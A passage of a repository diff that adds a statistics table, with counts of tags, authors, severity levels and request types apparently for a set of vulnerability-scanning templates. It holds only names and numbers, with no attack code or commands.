,{"name":"fortinet","count":1},{"name":"k8","count":1},{"name":"azure","count":1},{"name":"opm","count":1},{"name":"fortigates","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"payara","count":1},{"name":"tenda","count":1},{"name":"symfony","count":1},{"name":"linkerd","count":1},{"name":"biometrics","count":1},{"name":"acexy","count":1},{"name":"exchange","count":1},{"name":"alerta","count":1},{"name":"postgres","count":1},{"name":"diris","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"gloo","count":1},{"name":"74cms","count":1},{"name":"tamronos","count":1},{"name":"2014","count":1},{"name":"dvr","count":1},{"name":"bruteforce","count":1},{"name":"akamai","count":1},{"name":"zcms","count":1},{"name":"jsp","count":1},{"name":"zte","count":1},{"name":"swagger","count":1},{"name":"xml","count":1},{"name":"pacsone","count":1},{"name":"shopxo","count":1},{"name":"xff","count":1},{"name":"springframework","count":1},{"name":"pippoint","count":1},{"name":"postmessage","count":1},{"name":"webadmin","count":1},{"name":"webmodule-ee","count":1},{"name":"nc2","count":1},{"name":"realteo","count":1},{"name":"kyan","count":1},{"name":"upnp","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"nuuo","count":1},{"name":"k8s","count":1},{"name":"plugin","count":1},{"name":"rabbitmq","count":1},{"name":"redis","count":1},{"name":"appweb","count":1},{"name":"tensorboard","count":1},{"name":"centos","count":1},{"name":"heroku","count":1},{"name":"thinkadmin","count":1},{"name":"majordomo2","count":1},{"name":"concrete","count":1},{"name":"cve2007","count":1},{"name":"db","count":1},{"name":"myucms","count":1},{"name":"mdb","count":1},{"name":"dotnet","count":1},{"name":"redwood","count":1},{"name":"zimbra","count":1},{"name":"csrf","count":1},{"name":"backdoor","count":1},{"name":"extractor","count":1},{"name":"glances","count":1},{"name":"landray","count":1},{"name":"portainer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"nette","count":1},{"name":"anchorcms","count":1},{"name":"mpsec","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"feifeicms","count":1},{"name":"cloudinary","count":1},{"name":"panos","count":1},{"name":"expn","count":1},{"name":"nsasg","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"jenkin","count":1},{"name":"servicenow","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"mongoshake","count":1},{"name":"sarg","count":1},{"name":"bitly","count":1},{"name":"setup","count":1},{"name":"soar","count":1},{"name":"plastic","count":1},{"name":"revision","count":1},{"name":"kafdrop","count":1},{"name":"netrc","count":1},{"name":"jenzabar","count":1},{"name":"spring","count":1},{"name":"tongda","count":1},{"name":"vsftpd","count":1},{"name":"b2evolution","count":1},{"name":"tensorflow","count":1},{"name":"weiphp","count":1},{"name":"javafaces","count":1},{"name":"nomad","count":1},{"name":"webmin","count":1},{"name":"status","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"skywalking","count":1},{"name":"emby","count":1},{"name":"cobub","count":1},{"name":"ganglia","count":1},{"name":"cve2010","count":1},{"name":"apiman","count":1},{"name":"visionhub","count":1},{"name":"robomongo","count":1},{"name":"xunchi","count":1},{"name":"redhat","count":1},{"name":"fuelcms","count":1},{"name":"mysql","count":1},{"name":"proftpd","count":1},{"name":"ulterius","count":1},{"name":"lansweeper","count":1},{"name":"fortilogger","count":1},{"name":"labtech","count":1},{"name":"netsweeper","count":1},{"name":"pgadmin","count":1},{"name":"ns","count":1},{"name":"arl","count":1},{"name":"moinmoin","count":1},{"name":"kong","count":1},{"name":"opensmtpd","count":1},{"name":"zzzcms","count":1},{"name":"octobercms","count":1},{"name":"upload","count":1},{"name":"pyramid","count":1},{"name":"moin","count":1},{"name":"vsphere","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"jitsi","count":1},{"name":"avtech","count":1},{"name":"opentsdb","count":1},{"name":"chinaunicom","count":1},{"name":"jeewms","count":1},{"name":"aspnuke","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"igs","count":1},{"name":"viewpoint","count":1},{"name":"ssl","count":1},{"name":"tileserver","count":1},{"name":"saltapi","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"melbadry9","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"philippedelteil","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"ganofins","count":5},{"name":"puzzlepeaches","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"kophjager007","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"foulenzer","count":2},{"name":"lu4nx","count":2},{"name":"incogbyte","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"randomrobbie","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"jarijaas","count":2},{"name":"elsfa7110","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"lotusdll","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"joeldeleep","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"mavericknerd","count":2},{"name":"shifacyclewala","count":2},{"name":"moritz nentwig","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"ehsahil","count":2},{"name":"toufik airane","count":1},{"name":"kurohost","count":1},{"name":"soyelmago","count":1},{"name":"b4uh0lz","count":1},{"name":"streetofhackerr007","count":1},{"name":"nkxxkn","count":1},{"name":"_darrenmartyn","count":1},{"name":"fabaff","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"regala_","count":1},{"name":"ahmed sherif","count":1},{"name":"vzamanillo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"jeya seelan","count":1},{"name":"divya_mudgal","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"koti2","count":1},{"name":"nytr0gen","count":1},{"name":"apt-mirror","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"gal nagli","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"berkdusunur","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"elmahdi","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"yavolo","count":1},{"name":"r3naissance","count":1},{"name":"abison_binoy","count":1},{"name":"0xtavian","count":1},{"name":"taielab","count":1},{"name":"th3.d1p4k","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"sshell","count":1},{"name":"schniggie","count":1},{"name":"hanlaomo","count":1},{"name":"52971","count":1},{"name":"pdp","count":1},{"name":"_generic_human_","count":1},{"name":"cookiehanhoan","count":1},{"name":"ipanda","count":1},{"name":"kareemse1im","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"fmunozs","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"ilovebinbash","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"yashgoti","count":1},{"name":"sicksec","count":1},{"name":"mhdsamx","count":1},{"name":"idealphase","count":1},{"name":"yashanand155","count":1},{"name":"flag007","count":1},{"name":"ldionmarcil","count":1},{"name":"ringo","count":1},{"name":"akash.c","count":1},{"name":"remonsec","count":1},{"name":"dudez","count":1},{"name":"johnjhacking","count":1},{"name":"raesene","count":1},{"name":"smaranchand","count":1},{"name":"arcc","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"blckraven","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"johnk3r","count":1},{"name":"sy3omda","count":1},{"name":"c3l3si4n","count":1},{"name":"alph4byt3","count":1},{"name":"ajaysenr","count":1},{"name":"rojanrijal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"chron0x","count":1},{"name":"0xrod","count":1},{"name":"akshansh","count":1},{"name":"bolli95","count":1},{"name":"mohammedsaneem","count":1},{"name":"@dwisiswant0","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"thevillagehacker","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"bing0o","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"becivells","count":1},{"name":"andirrahmani1","count":1},{"name":"shreyapohekar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"dogasantos","count":1},{"name":"kabirsuda","count":1},{"name":"w4cky_","count":1},{"name":"affix","count":1},{"name":"defr0ggy","count":1},{"name":"tirtha_mandal","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"thezakman","count":1},{"name":"undefl0w","count":1},{"name":"zandros0","count":1},{"name":"deena","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mah3sec_","count":1},{"name":"alex","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"_harleo","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"vsh00t","count":1},{"name":"alperenkesk","count":1}],"directory":[{"name":"home","count":1591}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md new file mode 100644 index 0000000000..942ea53ea9 --- /dev/null +++ b/TEMPLATES-STATS.md @@ -0,0 +1,602 @@ +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 462 | dhiyaneshdk | 202 | home | 1591 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | | | high | 396 | file | 42 | +| xss | 168 | pikpikcu | 177 | | | medium | 312 | network | 32 | +| wordpress | 166 | dwisiswant0 | 113 | | | critical | 186 | dns | 10 | +| rce | 161 | geeknik | 88 | | | low | 150 | | | +| exposure | 154 | daffainfo | 78 | | | | | | | +| cve2020 | 135 | madrobot | 59 | | | | | | | +| lfi | 127 | princechaddha | 50 | | | | | | | +| wp-plugin | 111 | gaurang | 42 | | | | | | | +| cve2019 | 82 | gy741 | 35 | | | | | | | +| config | 81 | ice3man | 26 | | | | | | | +| tech | 72 | pussycat0x | 25 | | | | | | | +| takeover | 71 | 0x_akoko | 20 | | | | | | | +| cve2021 | 70 | organiccrap | 19 | | | | | | | +| token | 63 | sheikhrishad | 15 | | | | | | | +| cve2018 | 61 | milo2012 | 13 | | | | | | | +| apache | 60 | techbrunchfr | 13 | | | | | | | +| default-login | 45 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | pr3r00t | 12 | | | | | | | +| file | 42 | cyllective | 11 | | | | | | | +| unauth | 39 | random_robbie | 10 | | | | | | | +| network | 32 | righettod | 9 | | | | | | | +| iot | 32 | nadino | 8 | | | | | | | +| sqli | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | wdahlenb | 8 | | | | | | | +| workflow | 28 | iamthefrogy | 8 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | +| jira | 25 | randomstr1ng | 7 | | | | | | | +| ssrf | 25 | emadshanab | 7 | | | | | | | +| oob | 24 | dr_set | 7 | | | | | | | +| disclosure | 24 | melbadry9 | 7 | | | | | | | +| logs | 24 | 0x240x23elu | 7 | | | | | | | +| redirect | 20 | that_juan_ | 7 | | | | | | | +| aem | 18 | r3dg33k | 7 | | | | | | | +| listing | 15 | harshbothra_ | 7 | | | | | | | +| cisco | 15 | oppsec | 7 | | | | | | | +| cve2016 | 14 | philippedelteil | 6 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| debug | 13 | pentest_swissky | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| struts | 13 | ganofins | 5 | | | | | | | +| fuzz | 12 | caspergn | 5 | | | | | | | +| android | 12 | puzzlepeaches | 5 | | | | | | | +| weblogic | 12 | e_schultze_ | 4 | | | | | | | +| springboot | 11 | meme-lord | 4 | | | | | | | +| auth-bypass | 11 | rootxharsh | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| dns | 11 | iamnoooob | 4 | | | | | | | +| devops | 10 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 10 | xelkomy | 4 | | | | | | | +| cve2012 | 9 | kophjager007 | 3 | | | | | | | +| dlink | 9 | yash anand @yashanand155 | 3 | | | | | | | +| jenkins | 9 | fyoorer | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| cnvd | 8 | f1tz | 3 | | | | | | | +| php | 8 | joanbono | 3 | | | | | | | +| ftp | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | z3bd | 3 | | | | | | | +| cve2013 | 8 | impramodsargar | 3 | | | | | | | +| aws | 8 | binaryfigments | 3 | | | | | | | +| airflow | 8 | 0w4ys | 3 | | | | | | | +| adobe | 8 | shine | 3 | | | | | | | +| joomla | 7 | bsysop | 2 | | | | | | | +| cve2014 | 7 | afaq | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| scada | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| backup | 6 | zomsop82 | 2 | | | | | | | +| citrix | 6 | 0xprial | 2 | | | | | | | +| api | 6 | moritz nentwig | 2 | | | | | | | +| rconfig | 6 | amsda | 2 | | | | | | | +| cms | 6 | lu4nx | 2 | | | | | | | +| google | 6 | dheerajmadhukar | 2 | | | | | | | +| rails | 6 | foulenzer | 2 | | | | | | | +| xxe | 6 | davidmckennirey | 2 | | | | | | | +| nginx | 6 | ree4pwn | 2 | | | | | | | +| headless | 5 | hetroublemakr | 2 | | | | | | | +| jetty | 5 | joeldeleep | 2 | | | | | | | +| phpmyadmin | 5 | vavkamil | 2 | | | | | | | +| ruijie | 5 | elsfa7110 | 2 | | | | | | | +| lucee | 5 | mavericknerd | 2 | | | | | | | +| confluence | 5 | kiblyn11 | 2 | | | | | | | +| drupal | 5 | 0xcrypto | 2 | | | | | | | +| java | 5 | ehsahil | 2 | | | | | | | +| ssti | 5 | emenalf | 2 | | | | | | | +| iis | 5 | lotusdll | 2 | | | | | | | +| login | 5 | manas_harsh | 2 | | | | | | | +| circarlife | 5 | 0xrudra | 2 | | | | | | | +| solr | 5 | pxmme1337 | 2 | | | | | | | +| laravel | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | swissky | 2 | | | | | | | +| cve2009 | 4 | bp0lr | 2 | | | | | | | +| thinkphp | 4 | jarijaas | 2 | | | | | | | +| nodejs | 4 | 0xelkomy | 2 | | | | | | | +| solarwinds | 4 | unstabl3 | 2 | | | | | | | +| samsung | 4 | gevakun | 2 | | | | | | | +| elastic | 4 | shifacyclewala | 2 | | | | | | | +| fileupload | 4 | 0xsapra | 2 | | | | | | | +| django | 4 | random-robbie | 2 | | | | | | | +| ibm | 4 | randomrobbie | 2 | | | | | | | +| router | 4 | x1m_martijn | 2 | | | | | | | +| jolokia | 4 | _generic_human_ | 1 | | | | | | | +| webserver | 4 | fabaff | 1 | | | | | | | +| netgear | 4 | aceseven (digisec360) | 1 | | | | | | | +| docker | 4 | yashgoti | 1 | | | | | | | +| magmi | 4 | dudez | 1 | | | | | | | +| moodle | 4 | d0rkerdevil | 1 | | | | | | | +| hongdian | 4 | ringo | 1 | | | | | | | +| traversal | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| artifactory | 4 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| vpn | 4 | knassar702 | 1 | | | | | | | +| thinkcmf | 4 | soyelmago | 1 | | | | | | | +| asp | 4 | defr0ggy | 1 | | | | | | | +| tomcat | 4 | ajaysenr | 1 | | | | | | | +| r-seenet | 3 | co0nan | 1 | | | | | | | +| mongodb | 3 | toufik airane | 1 | | | | | | | +| kubernetes | 3 | th3.d1p4k | 1 | | | | | | | +| windows | 3 | alifathi-h1 | 1 | | | | | | | +| slack | 3 | akash.c | 1 | | | | | | | +| nosqli | 3 | divya_mudgal | 1 | | | | | | | +| amazon | 3 | 52971 | 1 | | | | | | | +| bypass | 3 | b4uh0lz | 1 | | | | | | | +| microstrategy | 3 | kurohost | 1 | | | | | | | +| openssh | 3 | sy3omda | 1 | | | | | | | +| vbulletin | 3 | raesene | 1 | | | | | | | +| backups | 3 | _c0wb0y_ | 1 | | | | | | | +| ofbiz | 3 | notsoevilweasel | 1 | | | | | | | +| springcloud | 3 | ooooooo_q | 1 | | | | | | | +| printer | 3 | mubassirpatel | 1 | | | | | | | +| kafka | 3 | mhdsamx | 1 | | | | | | | +| fanruan | 3 | thezakman | 1 | | | | | | | +| deserialization | 3 | smaranchand | 1 | | | | | | | +| fpd | 3 | rtcms | 1 | | | | | | | +| terramaster | 3 | naglinagli | 1 | | | | | | | +| git | 3 | ipanda | 1 | | | | | | | +| dedecms | 3 | koti2 | 1 | | | | | | | +| ebs | 3 | yavolo | 1 | | | | | | | +| grafana | 3 | whynotke | 1 | | | | | | | +| ssh | 3 | mohammedsaneem | 1 | | | | | | | +| caucho | 3 | rodnt | 1 | | | | | | | +| resin | 3 | affix | 1 | | | | | | | +| nacos | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | _harleo | 1 | | | | | | | +| log | 3 | wabafet | 1 | | | | | | | +| crlf | 3 | vsh00t | 1 | | | | | | | +| oa | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| prometheus | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| hjtcloud | 2 | r3naissance | 1 | | | | | | | +| telerik | 2 | streetofhackerr007 | 1 | | | | | | | +| ucmdb | 2 | s1r1u5_ | 1 | | | | | | | +| nextjs | 2 | shifacyclewla | 1 | | | | | | | +| strapi | 2 | yashanand155 | 1 | | | | | | | +| ecology | 2 | taielab | 1 | | | | | | | +| hp | 2 | becivells | 1 | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| globalprotect | 2 | shreyapohekar | 1 | | | | | | | +| rstudio | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | bad5ect0r | 1 | | | | | | | +| yapi | 2 | hanlaomo | 1 | | | | | | | +| bitrix | 2 | fopina | 1 | | | | | | | +| sonicwall | 2 | alperenkesk | 1 | | | | | | | +| openfire | 2 | alph4byt3 | 1 | | | | | | | +| keycloak | 2 | regala_ | 1 | | | | | | | +| couchdb | 2 | andirrahmani1 | 1 | | | | | | | +| sharepoint | 2 | gboddin | 1 | | | | | | | +| intrusive | 2 | its0x08 | 1 | | | | | | | +| plesk | 2 | noamrathaus | 1 | | | | | | | +| mida | 2 | 0h1in9e | 1 | | | | | | | +| activemq | 2 | manuelbua | 1 | | | | | | | +| showdoc | 2 | flag007 | 1 | | | | | | | +| microsoft | 2 | shelld3v | 1 | | | | | | | +| nagios | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| voipmonitor | 2 | qlkwej | 1 | | | | | | | +| frp | 2 | luci | 1 | | | | | | | +| idrac | 2 | deena | 1 | | | | | | | +| saltstack | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | omarkurt | 1 | | | | | | | +| vrealize | 2 | berkdusunur | 1 | | | | | | | +| spark | 2 | tirtha_mandal | 1 | | | | | | | +| smtp | 2 | 0xrod | 1 | | | | | | | +| chamilo | 2 | furkansenan | 1 | | | | | | | +| injection | 2 | pdp | 1 | | | | | | | +| maian | 2 | dogasantos | 1 | | | | | | | +| cache | 2 | luskabol | 1 | | | | | | | +| icewarp | 2 | apt-mirror | 1 | | | | | | | +| service | 2 | iampritam | 1 | | | | | | | +| waf | 2 | ohlinge | 1 | | | | | | | +| natshell | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| paloalto | 2 | rojanrijal | 1 | | | | | | | +| nexus | 2 | ahmed sherif | 1 | | | | | | | +| bigip | 2 | johnjhacking | 1 | | | | | | | +| seeyon | 2 | arcc | 1 | | | | | | | +| webcam | 2 | hakluke | 1 | | | | | | | +| proxy | 2 | thevillagehacker | 1 | | | | | | | +| smb | 2 | kareemse1im | 1 | | | | | | | +| hpe | 2 | abison_binoy | 1 | | | | | | | +| mail | 2 | tim_koopmans | 1 | | | | | | | +| kibana | 2 | sshell | 1 | | | | | | | +| exposures | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| emerge | 2 | jeya seelan | 1 | | | | | | | +| leak | 2 | alex | 1 | | | | | | | +| xxljob | 2 | 0xtavian | 1 | | | | | | | +| openam | 2 | kabirsuda | 1 | | | | | | | +| huawei | 2 | nkxxkn | 1 | | | | | | | +| glassfish | 2 | bolli95 | 1 | | | | | | | +| coldfusion | 2 | schniggie | 1 | | | | | | | +| zhiyuan | 2 | 0ut0fb4nd | 1 | | | | | | | +| fortios | 2 | gal nagli | 1 | | | | | | | +| zabbix | 2 | sicksec | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| dos | 2 | _darrenmartyn | 1 | | | | | | | +| hashicorp | 2 | fmunozs | 1 | | | | | | | +| httpd | 2 | @github.com/defr0ggy | 1 | | | | | | | +| shellshock | 2 | cookiehanhoan | 1 | | | | | | | +| jboss | 2 | absshax | 1 | | | | | | | +| splunk | 2 | dawid czarnecki | 1 | | | | | | | +| odoo | 2 | idealphase | 1 | | | | | | | +| cve2008 | 2 | sickwell | 1 | | | | | | | +| rockmongo | 2 | zandros0 | 1 | | | | | | | +| jellyfin | 2 | undefl0w | 1 | | | | | | | +| kentico | 2 | daviey | 1 | | | | | | | +| oauth | 2 | exploitation | 1 | | | | | | | +| rockethchat | 2 | j33n1k4 | 1 | | | | | | | +| trixbox | 2 | remonsec | 1 | | | | | | | +| rdp | 1 | nytr0gen | 1 | | | | | | | +| jfrog | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| geutebruck | 1 | akshansh | 1 | | | | | | | +| robomongo | 1 | chron0x | 1 | | | | | | | +| spring | 1 | zhenwarx | 1 | | | | | | | +| proftpd | 1 | willd96 | 1 | | | | | | | +| ueditor | 1 | ratnadip gajbhiye | 1 | | | | | | | +| ec2 | 1 | bing0o | 1 | | | | | | | +| szhe | 1 | elmahdi | 1 | | | | | | | +| nps | 1 | w4cky_ | 1 | | | | | | | +| axis | 1 | pudsec | 1 | | | | | | | +| zzzcms | 1 | c3l3si4n | 1 | | | | | | | +| blue-ocean | 1 | mah3sec_ | 1 | | | | | | | +| viewlinc | 1 | geraldino2 | 1 | | | | | | | +| kubeflow | 1 | kba@sogeti_esec | 1 | | | | | | | +| wooyun | 1 | patralos | 1 | | | | | | | +| tika | 1 | sullo | 1 | | | | | | | +| rmi | 1 | johnk3r | 1 | | | | | | | +| ilo4 | 1 | @dwisiswant0 | 1 | | | | | | | +| springframework | 1 | ilovebinbash | 1 | | | | | | | +| zmanda | 1 | blckraven | 1 | | | | | | | +| yachtcontrol | 1 | vzamanillo | 1 | | | | | | | +| jquery | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| revision | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| 